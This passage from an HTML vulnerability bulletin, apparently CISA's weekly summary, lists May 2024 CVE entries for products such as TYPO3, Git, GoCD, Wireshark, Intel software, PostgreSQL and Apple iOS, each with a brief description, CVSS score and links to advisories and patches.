<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4922" target="_blank">CVE-2024-4922</a><br><a href="https://github.com/HuoMingZ/aoligei/blob/main/ceshi.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264459" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264459" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.333760" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>TYPO3--typo3<br> </td>
<td>TYPO3 is an enterprise content management system. Starting in version 13.0.0 and prior to version 13.1.1, the history backend module is vulnerable to HTML injection. Although Content-Security-Policy headers effectively prevent JavaScript execution, adversaries can still inject malicious HTML markup. Exploiting this vulnerability requires a valid backend user account. TYPO3 version 13.1.1 fixes the problem described.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34355&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">3.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34355" target="_blank">CVE-2024-34355</a><br><a href="https://github.com/TYPO3/typo3/commit/56afa304ba8b5ad302e15df5def71bcc8d820375" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/TYPO3/typo3/security/advisories/GHSA-xjwx-78x7-q6jc" target="_blank">security-advisories@github.com</a><br><a href="https://typo3.org/security/advisory/typo3-core-sa-2024-007" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>Wireshark Foundation--editcap<br> </td>
<td>Memory handling issue in editcap could cause denial of service via crafted capture file</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4853&amp;vector=CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:L" target="_blank" title="CVSS V3 Score">3.6</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4853" target="_blank">CVE-2024-4853</a><br><a href="https://gitlab.com/wireshark/wireshark/-/issues/19724" target="_blank">cve@gitlab.com</a><br><a href="https://www.wireshark.org/security/wnpa-sec-2024-08.html" target="_blank">cve@gitlab.com</a></td>
</tr>
<tr>
<td>Wireshark Foundation--editcap<br> </td>
<td>Use after free issue in editcap could cause denial of service via crafted capture file</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4855&amp;vector=CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:L" target="_blank" title="CVSS V3 Score">3.6</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4855" target="_blank">CVE-2024-4855</a><br><a href="https://gitlab.com/wireshark/wireshark/-/issues/19782" target="_blank">cve@gitlab.com</a><br><a href="https://gitlab.com/wireshark/wireshark/-/issues/19783" target="_blank">cve@gitlab.com</a><br><a href="https://gitlab.com/wireshark/wireshark/-/issues/19784" target="_blank">cve@gitlab.com</a><br><a href="https://www.wireshark.org/security/wnpa-sec-2024-08.html" target="_blank">cve@gitlab.com</a></td>
</tr>
<tr>
<td>cea-hpc--sshproxy<br> </td>
<td>sshproxy is used on a gateway to transparently proxy a user SSH connection on the gateway to an internal host via SSH. Prior to version 1.6.3, any user authorized to connect to a ssh server using `sshproxy` can inject options to the `ssh` command executed by `sshproxy`. All versions of `sshproxy` are impacted. The problem is patched starting in version 1.6.3. The only workaround is to use the `force_command` option in `sshproxy.yaml`, but it's rarely relevant.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34713&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N" target="_blank" title="CVSS V3 Score">3.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34713" target="_blank">CVE-2024-34713</a><br><a href="https://github.com/cea-hpc/sshproxy/commit/f7eabd05d5f0f951e160293692327cad9a7d9580" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/cea-hpc/sshproxy/security/advisories/GHSA-jmqp-37m5-49wh" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>code-projects--Simple Chat System<br> </td>
<td>A vulnerability, which was classified as problematic, was found in code-projects Simple Chat System 1.0. Affected is an unknown function of the file /register.php. The manipulation of the argument name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-264540.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4974&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">3.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4974" target="_blank">CVE-2024-4974</a><br><a href="https://github.com/BurakSevben/CVEs/blob/main/Simple%20Chat%20App/Simple%20Chat%20App%20-%20Cross-Site-Scripting-1.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264540" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264540" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.335205" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>code-projects--Simple Chat System<br> </td>
<td>A vulnerability, which was classified as problematic, has been found in code-projects Simple Chat System 1.0. This issue affects some unknown processing of the component Message Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-264539.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4975&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">3.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4975" target="_blank">CVE-2024-4975</a><br><a href="https://github.com/BurakSevben/CVEs/blob/main/Simple%20Chat%20App/Simple%20Chat%20App%20-%20Cross-Site-Scripting-2.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264539" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264539" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.335206" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>git--git<br> </td>
<td>Git is a revision control system. Prior to versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4, local clones may end up hardlinking files into the target repository's object database when source and target repository reside on the same disk. If the source repository is owned by a different user, then those hardlinked files may be rewritten at any point in time by the untrusted user. Cloning local repositories will cause Git to either copy or hardlink files of the source repository into the target repository. This significantly speeds up such local clones compared to doing a "proper" clone and saves both disk space and compute time. When cloning a repository located on the same disk that is owned by a different user than the current user we also end up creating such hardlinks. These files will continue to be owned and controlled by the potentially-untrusted user and can be rewritten by them at will in the future. The problem has been patched in versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32020&amp;vector=CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:N/I:L/A:L" target="_blank" title="CVSS V3 Score">3.9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32020" target="_blank">CVE-2024-32020</a><br><a href="https://github.com/git/git/commit/1204e1a824c34071019fe106348eaa6d88f9528d" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/git/git/commit/9e65df5eab274bf74c7b570107aacd1303a1e703" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/git/git/security/advisories/GHSA-5rfh-556j-fhgj" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>git--git<br> </td>
<td>Git is a revision control system. Prior to versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4, when cloning a local source repository that contains symlinks via the filesystem, Git may create hardlinks to arbitrary user-readable files on the same filesystem as the target repository in the `objects/` directory. Cloning a local repository over the filesystem may creating hardlinks to arbitrary user-owned files on the same filesystem in the target Git repository's `objects/` directory. When cloning a repository over the filesystem (without explicitly specifying the `file://` protocol or `--no-local`), the optimizations for local cloning will be used, which include attempting to hard link the object files instead of copying them. While the code includes checks against symbolic links in the source repository, which were added during the fix for CVE-2022-39253, these checks can still be raced because the hard link operation ultimately follows symlinks. If the object on the filesystem appears as a file during the check, and then a symlink during the operation, this will allow the adversary to bypass the check and create hardlinks in the destination objects directory to arbitrary, user-readable files. The problem has been patched in versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32021&amp;vector=CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:N/I:L/A:L" target="_blank" title="CVSS V3 Score">3.9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32021" target="_blank">CVE-2024-32021</a><br><a href="https://github.com/git/git/security/advisories/GHSA-mvxm-9j2h-qjx7" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>gocd--gocd<br> </td>
<td>GoCD is a continuous delivery server. GoCD versions from 19.4.0 to 23.5.0 (inclusive) are potentially vulnerable to a reflected cross-site scripting vulnerability on the loading page displayed while GoCD is starting, via abuse of a `redirect_to` query parameter with inadequate validation. Attackers could theoretically abuse the query parameter to steal session tokens or other values from the user's browser. In practice exploiting this to perform privileged actions is likely rather difficult to exploit because the target user would need to be triggered to open an attacker-crafted link in the period where the server is starting up (but not completely started), requiring chaining with a separate denial-of-service vulnerability. Additionally, GoCD server restarts invalidate earlier session tokens (i.e GoCD does not support persistent sessions), so a stolen session token would be unusable once the server has completed restart, and executed XSS would be done within a logged-out context. The issue is fixed in GoCD 24.1.0. As a workaround, it is technically possible in earlier GoCD versions to override the loading page with an earlier version which is not vulnerable, by starting GoCD with the Java system property override as either `-Dloading.page.resource.path=/loading_pages/default.loading.page.html` (simpler early version of loading page without GoCD introduction) or `-Dloading.page.resource.path=/does_not_exist.html` (to display a simple message with no interactivity).</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-28866&amp;vector=CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">3.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-28866" target="_blank">CVE-2024-28866</a><br><a href="https://github.com/gocd/gocd/commit/388d8893ec4cac51d2b76e923cc9b55c7703e402" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/gocd/gocd/releases/tag/24.1.0" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/gocd/gocd/security/advisories/GHSA-q882-q6mm-mgvh" target="_blank">security-advisories@github.com</a><br><a href="https://www.gocd.org/releases/#24-1-0" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>helderk--Maintenance Mode<br> </td>
<td>Authentication Bypass by Spoofing vulnerability in helderk Maintenance Mode allows Functionality Bypass.This issue affects Maintenance Mode: from n/a through 3.0.1.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32708&amp;vector=CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" target="_blank" title="CVSS V3 Score">3.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32708" target="_blank">CVE-2024-32708</a><br><a href="https://patchstack.com/database/vulnerability/hkdev-maintenance-mode/wordpress-maintenance-mode-plugin-3-0-1-ip-bypass-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>n/a--Emlog Pro<br> </td>
<td>A vulnerability was found in Emlog Pro 2.3.4. It has been classified as problematic. This affects an unknown part of the component Cookie Handler. The manipulation of the argument AuthCookie leads to improper authentication. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-264741 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-5044&amp;vector=CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" target="_blank" title="CVSS V3 Score">3.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-5044" target="_blank">CVE-2024-5044</a><br><a href="https://github.com/ssteveez/emlog/blob/main/emlog%20pro%20version%202.3.4%20has%20session(AuthCookie)%20persistence%20and%20any%20user%20login%20vulnerability.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264741" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264741" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.331857" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) CBI software<br> </td>
<td>Improper input validation in some Intel(R) CBI software before version 1.1.0 may allow an authenticated user to potentially enable denial of service via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-43745&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:L" target="_blank" title="CVSS V3 Score">2.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-43745" target="_blank">CVE-2023-43745</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01013.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) Media SDK and some Intel(R) oneVPL software<br> </td>
<td>Out-of-bounds read in Intel(R) Media SDK and some Intel(R) oneVPL software before version 23.3.5 may allow an authenticated user to potentially enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-22656&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">3.9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-22656" target="_blank">CVE-2023-22656</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00935.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) Media SDK software<br> </td>
<td>Improper buffer restrictions in Intel(R) Media SDK software all versions may allow an authenticated user to potentially enable denial of service via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-47169&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" target="_blank" title="CVSS V3 Score">3.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-47169" target="_blank">CVE-2023-47169</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00935.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) Power Gadget software for macOS<br> </td>
<td>Improper conditions check in Intel(R) Power Gadget software for macOS all versions may allow an authenticated user to potentially enable information disclosure via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-38420&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" target="_blank" title="CVSS V3 Score">3.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-38420" target="_blank">CVE-2023-38420</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01037.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) Processors<br> </td>
<td>Hardware logic contains race conditions in some Intel(R) Processors may allow an authenticated user to potentially enable partial information disclosure via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-45733&amp;vector=CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:L/I:N/A:N" target="_blank" title="CVSS V3 Score">2.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-45733" target="_blank">CVE-2023-45733</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01051.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) Trace Analyzer and Collector software<br> </td>
<td>Out-of-bounds read for some Intel(R) Trace Analyzer and Collector software before version 2022.0.0 published Nov 2023 may allow an authenticated user to potentially enable information disclosure via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-22384&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N" target="_blank" title="CVSS V3 Score">2.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-22384" target="_blank">CVE-2024-22384</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00983.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) oneVPL software<br> </td>
<td>Out-of-bounds write in Intel(R) Media SDK all versions and some Intel(R) oneVPL software before version 23.3.5 may allow an authenticated user to potentially enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-47282&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:L" target="_blank" title="CVSS V3 Score">3.9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-47282" target="_blank">CVE-2023-47282</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00935.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) oneVPL software<br> </td>
<td>NULL pointer dereference in some Intel(R) oneVPL software before version 23.3.5 may allow an authenticated user to potentially enable information disclosure via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-48727&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" target="_blank" title="CVSS V3 Score">3.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-48727" target="_blank">CVE-2023-48727</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00935.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--PostgreSQL<br> </td>
<td>Missing authorization in PostgreSQL built-in views pg_stats_ext and pg_stats_ext_exprs allows an unprivileged database user to read most common values and other statistics from CREATE STATISTICS commands of other users. The most common values may reveal column values the eavesdropper could not otherwise read or results of functions they cannot execute. Installing an unaffected version only fixes fresh PostgreSQL installations, namely those that are created with the initdb utility after installing that version. Current PostgreSQL installations will remain vulnerable until they follow the instructions in the release notes. Within major versions 14-16, minor versions before PostgreSQL 16.3, 15.7, and 14.12 are affected. Versions before PostgreSQL 14 are unaffected.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4317&amp;vector=CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N" target="_blank" title="CVSS V3 Score">3.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4317" target="_blank">CVE-2024-4317</a><br><a href="https://www.postgresql.org/support/security/CVE-2024-4317/" target="_blank">f86ef6dc-4d3a-42ad-8f28-e6d5547a5007</a></td>
</tr>
<tr>
<td>octo-sts--app<br> </td>
<td>octo-sts is a GitHub App that acts like a Security Token Service (STS) for the Github API. This vulnerability can spike the resource utilization of the STS service, and combined with a significant traffic volume could potentially lead to a denial of service. This vulnerability is fixed in 0.1.0</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34079&amp;vector=CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" target="_blank" title="CVSS V3 Score">3.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34079" target="_blank">CVE-2024-34079</a><br><a href="https://github.com/octo-sts/app/commit/74ba874c017cf973edd6711144cf4399a9fcff57" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/octo-sts/app/security/advisories/GHSA-75r6-6jg8-pfcq" target="_blank">security-advisories@github.com</a></td>
</tr>
</tbody>
</table>
<p><a href="https://www.cisa.gov/#top">Back to top</a></p>
</div>
<div>
<h2>Severity Not Yet Assigned</h2>
<table summary="Severity Not Yet Assigned" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th scope="col" role="columnheader" data-tablesaw-priority="persist">Primary<br>Vendor -- Product</th>
<th scope="col" role="columnheader">Description</th>
<th scope="col" role="columnheader">Published</th>
<th scope="col" role="columnheader">CVSS Score</th>
<th scope="col" role="columnheader">Source &amp; Patch Info</th>
</tr>
</thead>
<tbody>
<tr>
<td>Aidin--Phormer<br> </td>
<td>Phormer prior to version 3.35 contains a cross-site scripting vulnerability. If this vulnerability is exploited, a remote unauthenticated attacker may execute an arbitrary script on the web browser of the user.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34749" target="_blank">CVE-2024-34749</a><br><a href="http://p.horm.org/er/" target="_blank">vultures@jpcert.or.jp</a><br><a href="https://github.com/eyedean/phormer" target="_blank">vultures@jpcert.or.jp</a><br><a href="https://jvn.jp/en/jp/JVN61054671/" target="_blank">vultures@jpcert.or.jp</a><br><a href="https://sourceforge.net/projects/rephormer/" target="_blank">vultures@jpcert.or.jp</a></td>
</tr>
<tr>
<td>Ant Media--Ant Media Server Community Edition<br> </td>
<td>Ant Media Server Community Edition in a default configuration is vulnerable to an improper HTTP header based authorization, leading to a possible use of non-administrative API calls reserved only for authorized users.  All versions up to 2.9.0 (tested) and possibly newer ones are believed to be vulnerable as the vendor has not confirmed releasing a patch.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3462" target="_blank">CVE-2024-3462</a><br><a href="https://antmedia.io/" target="_blank">cvd@cert.pl</a><br><a href="https://cert.pl/en/posts/2024/05/CVE-2024-3462" target="_blank">cvd@cert.pl</a><br><a href="https://cert.pl/posts/2024/05/CVE-2024-3462" target="_blank">cvd@cert.pl</a></td>
</tr>
<tr>
<td>Apache Software Foundation--Apache Airflow<br> </td>
<td>Apache Airflow version 2.9.0 has a vulnerability that allows an authenticated attacker to inject malicious data into the task instance logs.  Users are recommended to upgrade to version 2.9.1, which fixes this issue.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32077" target="_blank">CVE-2024-32077</a><br><a href="https://github.com/apache/airflow/pull/38882" target="_blank">security@apache.org</a><br><a href="https://lists.apache.org/thread/gsjmnrqb3m5fzp0vgpty1jxcywo91v77" target="_blank">security@apache.org</a></td>
</tr>
<tr>
<td>Apple--iOS and iPadOS<br> </td>
<td>A logic issue was addressed with improved checks. This issue is fixed in iOS 16.7.8 and iPadOS 16.7.8, macOS Monterey 12.7.5, macOS Ventura 13.6.7, macOS Sonoma 14.4. An app may be able to access user-sensitive data.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27789" target="_blank">CVE-2024-27789</a><br><a href="https://support.apple.com/en-us/HT214084" target="_blank">product-security@apple.com</a><br><a href="https://support.apple.com/en-us/HT214100" target="_blank">product-security@apple.com</a><br><a href="https://support.apple.com/en-us/HT214105" target="_blank">product-security@apple.com</a><br><a href="https://support.apple.com/en-us/HT214107" target="_blank">product-security@apple.com</a></td>
</tr>
<tr>
<td>Apple--iOS and iPadOS<br> </td>
<td>The issue was addressed with improved checks. This issue is fixed in iOS 17.5 and iPadOS 17.5, macOS Sonoma 14.5. An attacker may be able to elevate privileges.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27796" target="_blank">CVE-2024-27796</a><br><a href="https://support.apple.com/en-us/HT214101" target="_blank">product-security@apple.com</a><br><a href="https://support.apple.com/en-us/HT214106" target="_blank">product-security@apple.com</a></td>
</tr>
<tr>
<td>Apple--iOS and iPadOS<br> </td>
<td>A permissions issue was addressed with improved validation. This issue is fixed in iOS 17.5 and iPadOS 17.5. An attacker with physical access may be able to share items from the lock screen.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27803" target="_blank">CVE-2024-27803</a><br><a href="https://support.apple.com/en-us/HT214101" target="_blank">product-security@apple.com</a></td>
</tr>
<tr>
<td>Apple--iOS and iPadOS<br> </td>
<td>The issue was addressed with improved memory handling. This issue is fixed in iOS 17.5 and iPadOS 17.5, tvOS 17.5, watchOS 10.5, macOS Sonoma 14.5. An app may be able to execute arbitrary code with kernel privileges.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27804" target="_blank">CVE-2024-27804</a><br><a href="https://support.apple.com/en-us/HT214101" target="_blank">product-security@apple.com</a><br><a href="https://support.apple.com/en-us/HT214102" target="_blank">product-security@apple.com</a><br><a href="https://support.apple.com/en-us/HT214104" target="_blank">product-security@apple.com</a><br><a href="https://support.apple.com/en-us/HT214106" target="_blank">product-security@apple.com</a></td>
</tr>
<tr>
<td>Apple--iOS and iPadOS<br> </td>
<td>A path handling issue was addressed with improved validation. This issue is fixed in iOS 17.5 and iPadOS 17.5, tvOS 17.5, watchOS 10.5, macOS Sonoma 14.5. An app may be able to read sensitive location information.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27810" target="_blank">CVE-2024-27810</a><br><a href="https://support.apple.com/en-us/HT214101" target="_blank">product-security@apple.com</a><br><a href="https://support.apple.com/en-us/HT214102" target="_blank">product-security@apple.com</a><br><a href="https://support.apple.com/en-us/HT214104" target="_blank">product-security@apple.com</a><br><a href="https://support.apple.com/en-us/HT214106" target="_blank">product-security@apple.com</a></td>
</tr>
<tr>
<td>Apple--iOS and iPadOS<br> </td>
<td>A logic issue was addressed with improved checks. This issue is fixed in iOS 17.5 and iPadOS 17.5, tvOS 17.5, watchOS 10.5, macOS Sonoma 14.5. An attacker may be able to access user data.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27816" target="_blank">CVE-2024-27816</a><br><a href="https://support.apple.com/en-us/HT214101" target="_blank">product-security@apple.com</a><br><a href="https://support.apple.com/en-us/HT214102" target="_blank">product-security@apple.com</a><br><a href="https://support.apple.com/en-us/HT214104" target="_blank">product-security@apple.com</a><br><a href="https://support.apple.com/en-us/HT214106" target="_blank">product-security@apple.com</a></td>
</tr>
<tr>
<td>Apple--iOS and iPadOS<br> </td>
<td>The issue was addressed with improved memory handling. This issue is fixed in iOS 17.5 and iPadOS 17.5, macOS Sonoma 14.5. An attacker may be able to cause unexpected app termination or arbitrary code execution.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27818" target="_blank">CVE-2024-27818</a><br><a href="https://support.apple.com/en-us/HT214101" target="_blank">product-security@apple.com</a><br><a href="https://support.apple.com/en-us/HT214106" target="_blank">product-security@apple.com</a></td>
</tr>
<tr>
<td>Apple--iOS and iPadOS<br> </td>
<td>A path handling issue was addressed with improved validation. This issue is fixed in iOS 17.5 and iPadOS 17.5, watchOS 10.5, macOS Sonoma 14.5. A shortcut may output sensitive user data without consent.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27821" target="_blank">CVE-2024-27821</a><br><a href="https://support.apple.com/en-us/HT214101" target="_blank">product-security@apple.com</a><br><a href="https://support.apple.com/en-us/HT214104" target="_blank">product-security@apple.com</a><br><a href="https://support.apple.com/en-us/HT214106" target="_blank">product-security@apple.com</a></td>
</tr>
<tr>
<td>Apple--iOS and iPadOS<br> </td>
<td>The issue was addressed with improved checks. This issue is fixed in iOS 17.5 and iPadOS 17.5, tvOS 17.5, Safari 17.5, watchOS 10.5, macOS Sonoma 14.5. An attacker with arbitrary read and write capability may be able to bypass Pointer Authentication.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
